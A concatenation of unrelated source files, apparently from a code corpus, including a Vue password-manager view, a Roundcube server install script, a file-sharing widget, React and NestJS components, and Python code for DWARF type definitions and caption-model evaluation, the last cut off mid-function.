<div class="ui relaxed divided list">
<div class="item" v-for="folder in folders | filterBy filter in 'name'" @click="openFolder(folder)">
<i class="large folder middle aligned icon"></i>
<div class="content">
<a class="header">{{ folder.name }}</a>
<div class="description">
Contains {{ typeof folder.folder_count === 'undefined' ? '???' : folder.folder_count }} folders and {{ typeof folder.password_count === 'undefined' ? '???' : folder.password_count }} passwords
</div>
</div>
</div>
<div class="item" v-for="password in passwords | filterBy filter in 'name'" @click="showPasswordDetails(password)">
<i class="large key middle aligned icon"></i>
<div class="content">
<a class="header">{{ password.name }}</a>
<div class="description">User: {{ password.user || 'no user' }}</div>
<div class="details" v-if="password.id == activePassword.id" transition="fade">
<div class="ui attached segment">
<table class="ui table">
<tbody>
<tr>
<td>User</td>
<td>{{ password.user }}</td>
</tr>
<tr>
<td>URL</td>
<td><a href="{{ password.url }}">{{ password.url }}</a></td>
</tr>
<tr>
<td>Password</td>
<td><span id="password_{{ password.id }}">******</span></td>
</tr>
</tbody>
</table>
</div>
<div class="ui two bottom attached buttons">
<button class="ui blue labeled icon button" @click="showPassword(password.id)">
<i class="search icon"></i>
Show Password
</button>
<button class="ui primary labeled icon button" @click="copyPassword(password.id)">
<i class="copy icon"></i>
Copy Password
</button>
</div>
</div>
</div>
</div>
</div>
</article>
<div id="password_copy_container">
<button id="copy_trigger" data-clipboard-text="{{ hiddenPassword }}"></button>
</div>
`,
data() {
return {
activePassword: {},
layout: 'grid',
filter: '',
hiddenPassword: '',
breadcrumb: [],
folders: [],
passwords: []
}
},
ready() {
this.loadContents(1);
setTimeout(() => new Clipboard('#copy_trigger'), 500);
},
methods: {
setLayout(layout) {
this.layout = layout;
},
openFolder(folder) {
this.loadContents(folder.id);
this.breadcrumb.push(folder);
},
openBreadcrumbFolder(folder) {
if (folder === 'root') {
this.breadcrumb = [];
this.loadContents(1);
} else {
if (this.breadcrumb[this.breadcrumb.length - 1] != folder) {
let position = this.breadcrumb.indexOf(folder);
this.breadcrumb.splice(position + 1);
}
this.loadContents(folder.id);
}
},
showPasswordDetails(password) {
this.activePassword = password;
},
loadContents(folderId) {
this.loadFolders(folderId);
this.loadPasswords(folderId);
},
loadFolders(folderId) {
this.folders = [];
$q.get(`/api/folder/${folderId}/folders`)
.success(({data}) => {
this.folders = data;
});
},
loadPasswords(folderId) {
this.passwords = [];
$q.get(`/api/folder/${folderId}/passwords`)
.success(({data}) => {
this.passwords = data;
});
},
showPassword(id) {
let el = $(`#password_${id}`);
let password = '';
this.passwords.forEach((item) => {
if (item.id == id)
password = item.password;
});
el.html(atob(password));
setTimeout(() => {el.html('******')}, 3000);
},
copyPassword(id) {
let password = '';
this.passwords.forEach((item) => {
if (item.id == id)
password = item.password;
});
this.hiddenPassword = <PASSWORD>(password);
setTimeout(() => {$('#copy_trigger').click()}, 50);
toastr.info('Copied password to clipboard');
setTimeout(() => {this.hiddenPassword = ''}, 100);
}
}
});
let Search = Vue.extend({
template: `
<div class="ui big fluid input">
<input type="text" placeholder="Search...">
</div>`
});
let App = Vue.extend({});
let router = new VueRouter();
router.map({
'/passwords': {
component: Passwords
},
'/search': {
component: Search
}
});
router.start(App, '#dashboardPage');
//# sourceMappingURL=dashboard.min.js.map
|
#actualizar repositorios
yum update -y
#!/bin/bash
#instalar paquetes
yum install httpd httpd-tools mariadb-server mariadb php php-fpm php-mysqlnd php-opcache php-gd php-xml php-mbstring php-json php-intl php-ldap
yum install https://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm
yum update && yum install epel-release
yum install http://rpms.remirepo.net/enterprise/remi-release-7.rpm
yum install yum-utils
echo "Ingrese la versión de su php Ejemplo si es 7.4 o 7.4.1 ingrese 74\n"
php -v
echo "\n"
read version_php
yum-config-manager --enable remi-php$version_php
yum install php-opcache
systemctl start httpd
systemctl start mariadb
systemctl enable httpd
systemctl enable mariadb
firewall-cmd --permanent --add-service=http
firewall-cmd --reload
echo "Es necesario configurar la base de datos y configurar, para ello ejecute el comando <mysql_secure_installation>\n"
echo "Finalizada la configuración iniciaremos sesión con <mysql -u root -p> y ejecutaremos los siguientes comandos:\n"
echo "create database roundcubedb;
create user roundcubeuser@localhost identified by 'roundcubepwd';
grant all on roundcubedb.* to roundcubeuser@localhost;
flush privileges;
exit;\n"
|
;(function() {
var kloudlessAppID = "iCZ_ICMy43H0NSoz0QbLvmyjzCHf2frAOPaBfWVgh9_vrFIM";
/*
* element: jQuery DOM element to bind the dropzone to. Requires an ID.
*/
var fs = window.FileSharer = function(element, successHandler) {
this.element = element;
this.successHandler = successHandler;
this.init();
};
fs.prototype.init = function() {
this.dropzone = window.Kloudless.dropzone({
app_id: kloudlessAppID,
elementId: this.element.attr('id'), // Element to bind the dropzone to
multiselect: true, // To upload more than 1 file.
// The options below apply to the File Explorer that appears when the
// dropzone is clicked.
computer: true,
link: true,
link_options: this.linkOptions,
services: ['all'],
types: ['all'],
});
if (this.successHandler)
this.dropzone.on('success', this.successHandler);
};
fs.prototype.setLinkOptions = function(opts) {
this.dropzone.update({
link_options: opts
});
};
})();
$.widget("custom.filesharer", {
// jQuery widget attributes/methods.
options: {
password: null,
expiration: null,
},
_create: function() {
var self = this;
self.fs = new window.FileSharer(self.element, function(files) {
self._trigger("complete", null, {files: files});
});
self.reload();
},
_setOptions: function( options ) {
this._super(options);
this.reload();
},
// Custom attributes/methods.
_getLinkOptions: function() {
return {
direct: false,
password: this.options.password,
expiration: this.options.expiration,
}
},
reload: function() {
this.fs.setLinkOptions(this._getLinkOptions());
},
});
$(document).ready(function() {
var $fs = $("#dropzone").filesharer({
complete: function(event, data) {
if (!data.files || data.files.length === 0)
return;
$("#results").empty();
var rowTmpl = $.templates("#resultRowTempl");
$.each(data.files, function(i, file) {
var rowHtml = rowTmpl.render({
name: file.name,
url: file.link,
expiration: $fs.option("expiration"),
password: $<PASSWORD>("password"),
});
$("#results").append(rowHtml);
});
$("#results-wrapper").show();
}
}).data("custom-filesharer");
$("#expiration").datetimepicker({
format: "Y-m-d H:i:00O",
step: 15,
allowBlank: true,
onChangeDateTime: function(dp, $input) {
$fs.option('expiration', $input.val())
},
});
$("#password").change(function() {
$fs.option('password', $(this).val());
});
$("#start").click(function() {
$("#cover-wrapper").hide();
$("#explorer-wrapper").show();
});
}); |
<filename>archguard/src/pages/system/metrics/Dfms.tsx
import React, { useState } from "react";
import { Select, Row, Col, Button, Radio, Cascader, Form } from "antd";
import { useMount } from "react-use";
import Echarts, { ECharts } from "echarts";
import { getChartsOption } from "./chartsUtils";
import {
transformCodeTreeToModuleOptions,
transformCodeTreeToCascaderOptions,
} from "@/utils/utils";
import useCodeTree from "@/store/global-cache-state/useCodeTree";
import { SelectValue } from "antd/lib/select";
import { Store } from "antd/lib/form/interface";
import { queryDFMSMetricBy, DFMSMetric } from "@/api/module/codeTree";
import { useForm } from "antd/lib/form/Form";
import { storage } from "@/store/storage/sessionStorage";
import { useParams } from "umi";
enum ClassInsibilityKey {
innerInstabilityAvg = "innerInstability",
outerInstabilityAvg = "outerInstability",
}
interface Dfms {
key: "module" | "package" | "class";
stability: "innerInstabilityAvg" | "outerInstabilityAvg";
}
let DFMSCharts: ECharts;
const Dfms = () => {
const [codeTree] = useCodeTree(parseInt(storage.getSystemId()));
const options = {
module: transformCodeTreeToModuleOptions(codeTree?.value!),
package: transformCodeTreeToCascaderOptions(codeTree?.value!, false),
class: transformCodeTreeToCascaderOptions(codeTree?.value!, true),
};
const [currentKey, setCurrentKey] = useState<Dfms["key"]>("module");
const [currentModule, setCurrentModule] = useState<SelectValue>();
const [currentStability, setCurrentStability] = useState<Dfms["stability"]>(
"outerInstabilityAvg",
);
const [dfmsMetric, setDFMSMetric] = useState<DFMSMetric>();
const [form] = useForm();
useMount(() => {
DFMSCharts = Echarts.init(document.getElementById("container") as HTMLDivElement);
DFMSCharts.setOption(getChartsOption());
});
const onStabilityChange = (value: Dfms["stability"]) => {
setCurrentStability(value);
const currentInstability =
currentKey === "class" ? dfmsMetric![ClassInsibilityKey[value]] : dfmsMetric![value];
DFMSCharts.setOption(getChartsOption([currentInstability, dfmsMetric!.absRatio]));
};
const onFinish = (values: Store) => {
Object.keys(values).map((key) => {
const current = values[key];
values[key] = typeof current === "string" ? current : current.join(".");
});
queryDFMSMetricBy(currentKey, values).then((res: DFMSMetric) => {
setDFMSMetric({ ...res });
const currentInstability =
currentKey === "class" ? res[ClassInsibilityKey[currentStability]] : res[currentStability];
DFMSCharts.setOption(getChartsOption([currentInstability, res.absRatio]));
});
};
return (
<div>
<Radio.Group
style={{ marginBottom: "12px" }}
value={currentKey}
onChange={({ target: { value } }) => setCurrentKey(value)}
>
<Radio.Button value="module">module</Radio.Button>
<Radio.Button value="package">package</Radio.Button>
<Radio.Button value="class">class</Radio.Button>
</Radio.Group>
<Form form={form} onFinish={onFinish}>
<Row gutter={12}>
<Col span={8}>
<Form.Item
name="moduleName"
rules={[
{
required: true,
message: "请选择模块",
},
]}
>
<Select
placeholder="模块"
style={{ width: "100%" }}
allowClear
showSearch
onChange={(value) => {
form.setFieldsValue({
moduleName: value,
packageName: [],
className: [],
});
setCurrentModule(value);
}}
>
{options["module"].map(({ value, label }) => {
return (
<Select.Option value={value} key={value}>
{label}
</Select.Option>
);
})}
</Select>
</Form.Item>
</Col>
{currentKey === "package" ? (
<Col flex="auto">
<Form.Item
name="packageName"
rules={[
{
required: true,
message: "请选择包名",
},
]}
>
<Cascader
changeOnSelect
style={{ width: "100%" }}
displayRender={(label) => label.join(".")}
options={options["package"][currentModule as string]}
placeholder="包名"
notFoundContent="请先选择模块!"
/>
</Form.Item>
</Col>
) : currentKey === "class" ? (
<Col flex="auto">
<Form.Item
name="className"
rules={[
{
required: true,
message: "请选择类名",
},
]}
>
<Cascader
style={{ width: "100%" }}
displayRender={(label) => label.join(".")}
options={options["class"][currentModule as string]}
placeholder="类名"
notFoundContent="请先选择模块!"
/>
</Form.Item>
</Col>
) : undefined}
<Col flex="80px">
<Form.Item>
<Button type="primary" htmlType="submit">
查询
</Button>
</Form.Item>
</Col>
</Row>
</Form>
<div style={{ textAlign: "center" }}>
<Radio.Group
value={currentStability}
onChange={({ target: { value } }) => onStabilityChange(value)}
>
<Radio.Button value="outerInstabilityAvg" disabled={!dfmsMetric}>
外部不稳定性
</Radio.Button>
<Radio.Button value="innerInstabilityAvg" disabled={!dfmsMetric}>
内部不稳定性
</Radio.Button>
</Radio.Group>
</div>
<div
id="container"
style={{
width: "800px",
height: "800px",
margin: "0 auto",
}}
></div>
</div>
);
};
export default Dfms;
|
<reponame>jrfaller/maracas
package main.unused.superclassRemoved;
public abstract class SuperclassRemovedAbs {
}
|
<reponame>AriusX7/godfather
import Faction from '@mafia/structures/Faction';
import type Player from '@mafia/structures/Player';
export default class WitchFaction extends Faction {
public name = 'Witch';
public independent = true;
public winCondition = 'game/factions:witchWinCondition';
public hasWonIndependent(player: Player) {
const aliveTownies = player.game.players.filter((pl) => pl.role.faction.name === 'Town' && pl.isAlive).length;
return player.isAlive && aliveTownies === 0;
}
}
|
# Copyright 2017 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from . import dwarf
from . import pyinternals
RefType = dwarf.FORM_ref4
class CType:
def die(self,dcu,abi,st,cache):
if cache is None: cache = {}
r = cache.get(self)
if r is None:
r = self._die(dcu,abi,st,cache)
cache[self] = r
dcu.children.append(r)
return r
def _die(self,dcu,abi,st,cache):
raise NotImplementedError()
def __hash__(self):
return hash(str(self))
def __str__(self):
return self.typestr('')
def size(self,abi):
raise NotImplementedError()
def typestr(self,deriv):
raise NotImplementedError()
def append_deriv(x,deriv):
return ' '.join((x,deriv)) if deriv else x
# noinspection PyAbstractClass
class BasicType(CType):
def full_name(self):
raise NotImplementedError()
def typestr(self,deriv):
return append_deriv(self.full_name(),deriv)
class TVoid(BasicType):
def full_name(self):
return 'void'
def __repr__(self):
return 'TVoid()'
def __eq__(self,b):
return isinstance(b,TVoid)
__hash__ = CType.__hash__
def _die(self,dcu,abi,st,cache):
return dwarf.DIE('unspecified_type',name=st['void'])
def size(self,abi):
raise TypeError('"void" does not have a size')
t_void = TVoid()
class TInt(BasicType):
def __init__(self,base_name,f_size,signed):
self.base_name = base_name
self.f_size = f_size
self.signed = signed
def full_name(self):
r = self.base_name
if not self.signed: r = 'unsigned ' + r
return r
def __repr__(self):
return 'TInt({!r},{!r},{!r})'.format(self.base_name,self.f_size,self.signed)
def __eq__(self,b):
return isinstance(b,TInt) and self.base_name == b.base_name and self.signed == b.signed
__hash__ = CType.__hash__
def _die(self,dcu,abi,st,cache):
return dwarf.DIE('base_type',
name=st[self.__str__()],
encoding=dwarf.ATE.signed if self.signed else dwarf.ATE.unsigned,
byte_size=dwarf.FORM_data1(self.f_size(abi)))
def size(self,abi):
return self.f_size(abi)
t_int = TInt('int',(lambda abi: abi.int_size),True)
t_uint = TInt(t_int.base_name,t_int.f_size,False)
t_long = TInt('long',(lambda abi: abi.long_size),True)
t_ulong = TInt(t_long.base_name,t_long.f_size,False)
class TFixedSizeBase(BasicType):
def __init__(self,name,size,signed,d_encoding):
self.name = name
self._size = size
self.signed = signed
self.d_encoding = d_encoding
def full_name(self):
return self.name
def __repr__(self):
return 'TFixedSizeBase({!r},{},{!r},{!r})'.format(self.name,self.size,self.signed,self.d_encoding)
def __eq__(self,b):
return isinstance(b,TFixedSizeBase) and self.name == b.base
__hash__ = CType.__hash__
def _die(self,dcu,abi,st,cache):
return dwarf.DIE('base_type',
name=st[self.name],
encoding=self.d_encoding,
byte_size=dwarf.FORM_data1(self._size))
def size(self,abi):
return self._size
t_char = TFixedSizeBase('char',1,True,dwarf.ATE.signed_char)
t_schar = TFixedSizeBase('signed char',1,True,dwarf.ATE.signed_char)
t_uchar = TFixedSizeBase('unsigned char',1,False,dwarf.ATE.unsigned_char)
class TConst(CType):
def __init__(self,base):
assert not isinstance(base,TConst)
self.base = base
def typestr(self,deriv):
return self.base.typestr(append_deriv('const',deriv))
def __repr__(self):
return 'TConst({!r})'.format(self.base)
def __eq__(self,b):
return isinstance(b,TPtr) and self.base == b.base
__hash__ = CType.__hash__
def _die(self,dcu,abi,st,cache):
return dwarf.DIE('const_type',type=RefType(self.base.die(dcu,abi,st,cache)))
def size(self,abi):
return self.base.size(abi)
class TPtr(CType):
def __init__(self,base):
self.base = base
def typestr(self,deriv):
return self.base.typestr('*'+deriv)
def __repr__(self):
return 'TPtr({!r})'.format(self.base)
def __eq__(self,b):
return isinstance(b,TPtr) and self.base == b.base
__hash__ = CType.__hash__
def _die(self,dcu,abi,st,cache):
return dwarf.DIE('pointer_type',
type=RefType(self.base.die(dcu,abi,st,cache)),
byte_size=dwarf.FORM_data1(abi.ptr_size))
def size(self,abi):
return abi.ptr_size
class TArray(CType):
def __init__(self,base,length):
assert length > 0
self.base = base
self.length = length
def typestr(self,deriv):
part = '[{}]'.format(self.length)
return self.base.typestr('({}){}'.format(deriv,part) if deriv else part)
def __repr__(self):
return 'TArray({!r},{})'.format(self.base,self.length)
def __eq__(self,b):
return isinstance(b,TArray) and self.base == b.base and self.length == b.length
__hash__ = CType.__hash__
def _die(self,dcu,abi,st,cache):
r = dwarf.DIE('array_type',
type=RefType(self.base.die(dcu,abi,st,cache)))
r.children.append(dwarf.DIE('subrange_type',
type=RefType(t_ulong.die(dcu,abi,st,cache)),
upper_bound=dwarf.smallest_data_form(self.length-1)))
return r
def size(self,abi):
return self.base.size(abi) * self.length
class TFunc(CType):
def __init__(self,params,returns):
self.params = params
self.returns = returns
def typestr(self,deriv):
return '{} ({})({})'.format(str(self.returns),deriv,','.join(map(str,self.params)))
def size(self,abi):
raise TypeError("it does not make sense to ask a function's size")
# This method throws an instance of ValueError and not NotImplementedError
# because it is not an abstract method. It simply hasn't been written, but
# it may be useful in the future to implement it.
def _die(self,dcu,abi,st,cache):
raise ValueError('not implemented')
class Attribute:
def __init__(self,name,datatype,offset):
self.name = name
self.datatype = datatype
self.offset = offset
class TStruct(BasicType):
def __init__(self,name,attrs=None):
self.name = name
self._attrs = ()
self.attr_lookup = {}
if attrs is not None:
self.attrs = attrs
@property
def attrs(self):
return self._attrs
@attrs.setter
def attrs(self,val):
self._attrs = val
self.attr_lookup = {a.name: a for a in val}
def full_name(self):
if self.name:
return 'struct ' + self.name
return '<anonymous struct>'
# NOTE: for now, this just mimics void, since we don't really need a full
# implementation
def _die(self,dcu,abi,st,cache):
return t_void.die(dcu,abi,st,cache)
def size(self,abi):
raise ValueError('not implemented')
class TTypedef(BasicType):
def __init__(self,name,base):
self.name = name
self.base = base
def full_name(self):
return self.name
def size(self,abi):
return self.base.size(abi)
def _die(self,dcu,abi,st,cache):
return dwarf.DIE('typedef',
name=st[self.name],
type=RefType(self.base.die(dcu,abi,st,cache)))
def real_type(x):
while isinstance(x,TTypedef):
x = x.base
return x
def real_isinstance(x,t):
return isinstance(real_type(x),t)
def stripped_type(x):
while isinstance(x,(TTypedef,TPtr,TConst)):
x = x.base
return x
def typedef_struct(typedef,name=None):
return TTypedef(typedef,TStruct(name))
PyObject = typedef_struct('PyObject','_object')
PyVarObject = typedef_struct('PyVarObject')
PyTypeObject = typedef_struct('PyTypeObject','_typeobject')
PyListObject = typedef_struct('PyListObject')
PyTupleObject = typedef_struct('PyTupleObject')
PyFrameObject = typedef_struct('PyFrameObject','_frame')
PyThreadState = typedef_struct('PyThreadState','_ts')
PyCellObject = typedef_struct('PyCellObject')
PyMethodObject = typedef_struct('PyMethodObject')
CompiledCode = typedef_struct('CompiledCode','_CompiledCode')
FunctionBody = typedef_struct('FunctionBody')
Function = typedef_struct('Function')
Generator = typedef_struct('Generator')
PyDictObject = typedef_struct('PyDictObject')
PyCodeObject = typedef_struct('PyCodeObject')
t_void_ptr = TPtr(t_void)
PyObject_ptr = TPtr(PyObject)
PyTypeObject_ptr = TPtr(PyTypeObject)
Py_tracefunc = t_void_ptr
PyThreadState_ptr = TPtr(PyThreadState)
PyFrameObject_ptr = TPtr(PyFrameObject)
PyCodeObject_ptr = TPtr(PyCodeObject)
PyDictObject_ptr = TPtr(PyDictObject)
const_char_ptr = TPtr(TConst(t_char))
Function_ptr = TPtr(Function)
FunctionBody_ptr = TPtr(FunctionBody)
Py_ssize_t = t_long
size_t = t_ulong
def set_attrs(t,attrs):
real_type(t).attrs = sorted(
(Attribute(name,datatype,pyinternals.member_offsets[t.name][name]) for name,datatype in attrs),
key=(lambda a: a.offset))
set_attrs(PyObject,[
('ob_refcnt',Py_ssize_t),
('ob_type',PyTypeObject_ptr)
])
set_attrs(PyVarObject,[
('ob_size',Py_ssize_t)
])
set_attrs(PyTypeObject,[
('tp_dealloc',t_void_ptr),
('tp_iternext',t_void_ptr),
('tp_flags',t_void_ptr)
])
set_attrs(PyTupleObject,[
('ob_item',t_void_ptr)
])
func_signatures = {
'PyMem_Malloc' : TFunc([size_t],t_void_ptr),
'Py_IncRef' : TFunc([PyObject_ptr],t_void),
'Py_DecRef' : TFunc([PyObject_ptr],t_void),
'Py_AddPendingCall' : TFunc([TPtr(TFunc([t_void_ptr],t_int)),t_void_ptr],t_int),
'PyDict_GetItem' : TFunc([PyObject_ptr,PyObject_ptr],PyObject_ptr),
'PyDict_SetItem' : TFunc([PyObject_ptr,PyObject_ptr,PyObject_ptr],t_int),
'PyDict_DelItem' : TFunc([PyObject_ptr,PyObject_ptr],t_int),
'PyDict_GetItemString' : TFunc([PyObject_ptr,const_char_ptr],PyObject_ptr),
'PyDict_Size' : TFunc([PyObject_ptr],Py_ssize_t),
'PyDict_Copy' : TFunc([PyObject_ptr],PyObject_ptr),
'PyDict_New' : TFunc([],PyObject_ptr),
'_PyDict_NewPresized' : TFunc([Py_ssize_t],PyObject_ptr),
'_PyDict_LoadGlobal' : TFunc([PyDictObject_ptr,PyDictObject_ptr,PyObject_ptr],PyObject_ptr),
'PyObject_IsSubclass' : TFunc([PyObject_ptr,PyObject_ptr],t_int),
'PyObject_GetItem' : TFunc([PyObject_ptr,PyObject_ptr],PyObject_ptr),
'PyObject_SetItem' : TFunc([PyObject_ptr,PyObject_ptr,PyObject_ptr],t_int),
'PyObject_DelItem' : TFunc([PyObject_ptr,PyObject_ptr],t_int),
'PyObject_GetIter' : TFunc([PyObject_ptr],PyObject_ptr),
'PyObject_GetAttr' : TFunc([PyObject_ptr,PyObject_ptr],PyObject_ptr),
'PyObject_SetAttr' : TFunc([PyObject_ptr,PyObject_ptr,PyObject_ptr],t_int),
'PyObject_IsTrue' : TFunc([PyObject_ptr],t_int),
'PyObject_RichCompare' : TFunc([PyObject_ptr,PyObject_ptr,t_int],t_int),
'PyObject_Call' : TFunc([PyObject_ptr,PyObject_ptr,PyObject_ptr],PyObject_ptr),
'PyObject_CallObject' : TFunc([PyObject_ptr,PyObject_ptr],PyObject_ptr),
'PyEval_GetGlobals' : TFunc([],t_void),
'PyEval_GetBuiltins' : TFunc([],t_void),
'PyEval_GetLocals' : TFunc([],t_void),
'PyEval_AcquireThread' : TFunc([],t_void),
'_PyEval_SignalAsyncExc' : TFunc([],t_void),
'PyErr_Occurred' : TFunc([],t_void),
'PyErr_ExceptionMatches' : TFunc([],t_void),
'PyErr_Clear' : TFunc([],t_void),
'PyErr_Format' : TFunc([],t_void),
'PyErr_SetString' : TFunc([],t_void),
'PyErr_Fetch' : TFunc([],t_void),
'PyErr_Restore' : TFunc([],t_void),
'PyErr_NormalizeException' : TFunc([],t_void),
'PyException_SetTraceback' : TFunc([],t_void),
'PyNumber_Multiply' : TFunc([],t_void),
'PyNumber_TrueDivide' : TFunc([],t_void),
'PyNumber_FloorDivide' : TFunc([],t_void),
'PyNumber_Add' : TFunc([],t_void),
'PyNumber_Subtract' : TFunc([],t_void),
'PyNumber_Lshift' : TFunc([],t_void),
'PyNumber_Rshift' : TFunc([],t_void),
'PyNumber_And' : TFunc([],t_void),
'PyNumber_Xor' : TFunc([],t_void),
'PyNumber_Or' : TFunc([],t_void),
'PyNumber_InPlaceMultiply' : TFunc([],t_void),
'PyNumber_InPlaceTrueDivide' : TFunc([],t_void),
'PyNumber_InPlaceFloorDivide' : TFunc([],t_void),
'PyNumber_InPlaceRemainder' : TFunc([],t_void),
'PyNumber_InPlaceAdd' : TFunc([],t_void),
'PyNumber_InPlaceSubtract' : TFunc([],t_void),
'PyNumber_InPlaceLshift' : TFunc([],t_void),
'PyNumber_InPlaceRshift' : TFunc([],t_void),
'PyNumber_InPlaceAnd' : TFunc([],t_void),
'PyNumber_InPlaceXor' : TFunc([],t_void),
'PyNumber_InPlaceOr' : TFunc([],t_void),
'PyNumber_Positive' : TFunc([],t_void),
'PyNumber_Negative' : TFunc([],t_void),
'PyNumber_Invert' : TFunc([],t_void),
'PyNumber_Remainder' : TFunc([],t_void),
'PyNumber_Power' : TFunc([],t_void),
'PyLong_AsLong' : TFunc([],t_void),
'PyLong_FromLong' : TFunc([],t_void),
'PyList_New' : TFunc([],t_void),
'PyList_Append' : TFunc([],t_void),
'PyTuple_New' : TFunc([],t_void),
'PyTuple_Pack' : TFunc([],t_void),
'PySet_Add' : TFunc([],t_void),
'PySet_New' : TFunc([],t_void),
'PySlice_New' : TFunc([],t_void),
'PySequence_Contains' : TFunc([],t_void),
'PyTraceBack_Here' : TFunc([],t_void),
'PyUnicode_Format' : TFunc([],t_void),
'PyUnicode_Append' : TFunc([],t_void),
'PyUnicode_Concat' : TFunc([],t_void),
'PyCell_Get' : TFunc([],t_void),
'PyCell_Set' : TFunc([],t_void),
'PyCell_New' : TFunc([],t_void),
'_PyGen_FetchStopIterationValue' : TFunc([],t_void),
'new_function' : TFunc([FunctionBody_ptr,PyObject_ptr,PyObject_ptr,PyObject_ptr,PyObject_ptr,TPtr(PyObject_ptr),TPtr(PyObject_ptr),PyObject_ptr],PyObject_ptr),
'new_generator' : TFunc([PyFrameObject_ptr,Function_ptr,size_t],PyObject_ptr),
'free_pyobj_array' : TFunc([TPtr(PyObject_ptr),Py_ssize_t],t_void),
'missing_arguments' : TFunc([Function_ptr,TPtr(PyObject_ptr)],t_void),
'too_many_positional' : TFunc([Function_ptr,t_long,PyObject_ptr],t_void),
'excess_keyword' : TFunc([Function_ptr,PyObject_ptr],t_void),
'append_tuple_for_call' : TFunc([PyObject_ptr,PyObject_ptr,PyObject_ptr],PyObject_ptr),
'append_dict_for_call' : TFunc([PyObject_ptr,PyObject_ptr,PyObject_ptr],PyObject_ptr),
'prepare_exc_handler' : TFunc([TPtr(PyObject_ptr)],t_void),
'end_exc_handler' : TFunc([TPtr(PyObject_ptr)],t_void),
'format_exc_check_arg' : TFunc([PyObject_ptr,const_char_ptr,PyObject_ptr],PyObject_ptr),
'format_exc_unbound' : TFunc([PyCodeObject_ptr,t_int],PyObject_ptr),
'_unpack_iterable' : TFunc([PyObject_ptr,t_int,t_int,TPtr(PyObject_ptr)],t_int),
'_exception_cmp' : TFunc([PyObject_ptr,PyObject_ptr],PyObject_ptr),
'_do_raise' : TFunc([PyObject_ptr,PyObject_ptr],PyObject_ptr),
'import_all_from' : TFunc([PyObject_ptr,PyObject_ptr],t_int),
'special_lookup' : TFunc([PyObject_ptr,PyObject_ptr],PyObject_ptr),
'call_exc_trace' : TFunc([Py_tracefunc,PyObject_ptr,PyThreadState_ptr,PyFrameObject_ptr],t_void),
'_print_expr' : TFunc([PyObject_ptr],t_int),
'_load_build_class' : TFunc([PyObject_ptr],PyObject_ptr),
'c_global_name' : TFunc([PyObject_ptr,PyFrameObject_ptr],PyObject_ptr),
'c_local_name' : TFunc([PyObject_ptr,PyFrameObject_ptr],PyObject_ptr)
} |
import {
Body,
Controller,
Post,
UseGuards,
Request,
Get,
} from '@nestjs/common';
import { AuthGuard } from '@nestjs/passport';
import {
ApiBody,
ApiConflictResponse,
ApiCreatedResponse,
ApiOkResponse,
ApiOperation,
ApiParam,
ApiResponse,
ApiTags,
} from '@nestjs/swagger';
import { DoesUserExist } from 'src/core/guards/doesUserExist.guard';
import { LoginRequestDto } from '../users/dto/login.request.dto';
import { UserDto } from '../users/dto/user.dto';
import { AuthService } from './auth.service';
@ApiTags('Auth')
@Controller('auth')
export class AuthController {
constructor(private authService: AuthService) {}
@ApiOkResponse({
description: 'The user login successfully.',
})
@ApiOperation({ summary: 'User login' })
@Post('login')
async login(@Body() loginDto: LoginRequestDto) {
return await this.authService.login(loginDto);
}
@ApiOperation({ summary: 'User signup' })
@ApiCreatedResponse({
description: 'The user has been signup successfully.',
})
@ApiConflictResponse({ description: 'User already exists' })
@UseGuards(DoesUserExist)
@Post('signup')
async signUp(@Body() user: UserDto) {
return await this.authService.create(user);
}
}
|
<reponame>gyy8426/TF_concaption<gh_stars>0
import argparse, os, pdb, sys, time
import numpy as np
import copy
import glob
import subprocess
from multiprocessing import Process, Queue, Manager
from collections import OrderedDict
import data_engine
from cocoeval import COCOScorer
import utils
MAXLEN = 50
manager = Manager()
def update_params(shared_params, model_params):
for kk, vv in model_params.iteritems():
shared_params[kk] = vv
shared_params['id'] = shared_params['id'] + 1
def build_sample_pairs(samples, vidIDs):
D = OrderedDict()
for sample, vidID in zip(samples, vidIDs):
D[vidID] = [{'image_id': vidID, 'caption': sample}]
return D
def score_with_cocoeval(samples_valid, samples_test, engine):
scorer = COCOScorer()
if samples_valid:
gts_valid = OrderedDict()
for vidID in engine.valid_ids:
gts_valid[vidID] = engine.CAP[vidID]
valid_score = scorer.score(gts_valid, samples_valid, engine.valid_ids)
else:
valid_score = None
if samples_test:
gts_test = OrderedDict()
for vidID in engine.test_ids:
gts_test[vidID] = engine.CAP[vidID]
test_score = scorer.score(gts_test, samples_test, engine.test_ids)
else:
test_score = None
return valid_score, test_score
def generate_sample_gpu_single_process(
model_type, engine, options, sess, model,
f_init_inputs,f_init_outputs, f_next_inputs, f_next_outputs,
save_dir='./samples', beam=5,
whichset='both'):
def _seqs2words(caps):
capsw = []
for cc in caps:
ww = []
for w in cc:
if w == 0:
break
ww.append(engine.ix_word[1]
if w > len(engine.ix_word) else engine.ix_word[w])
capsw.append(' '.join(ww))
return capsw
def sample(whichset):
samples = []
ctxs, ctx_masks = engine.prepare_data_for_blue(whichset)
for i, ctx, ctx_mask in zip(range(len(ctxs)), ctxs, ctx_masks):
sys.stdout.write('\rsampling %d/%d'%(i,len(ctxs)))
sys.stdout.flush()
sample, score, _, _ = model.gen_sen_beam_search(sess, ctx, ctx_mask,
f_init_inputs,f_init_outputs,
f_next_inputs,f_next_outputs,
k=beam, maxlen=50)
sidx = np.argmin(score)
sample = sample[sidx]
#print _seqs2words([sample])[0]
samples.append(sample)
samples = _seqs2words(samples)
return samples
samples_valid = None
samples_test = None
if whichset == 'valid' or whichset == 'both':
print 'Valid Set...',
samples_valid = sample('valid')
with open(save_dir+'valid_samples.txt', 'w') as f:
print >>f, '\n'.join(samples_valid)
if whichset == 'test' or whichset == 'both':
print 'Test Set...',
samples_test = sample('test')
with open(save_dir+'test_samples.txt', 'w') as f:
print >>f, '\n'.join(samples_test)
if samples_valid:
samples_valid = build_sample_pairs(samples_valid, engine.valid_ids)
if samples_test:
samples_test = build_sample_pairs(samples_test, engine.test_ids)
return samples_valid, samples_test
def compute_score(
model_type,
options,
engine,
sess , model ,
save_dir,
beam=5, n_process=5,
whichset='both',
on_cpu=False,
processes=None, queue=None, rqueue=None,
shared_params=None, metric=None,
one_time=False,
f_init_inputs=None,f_init_outputs=None,
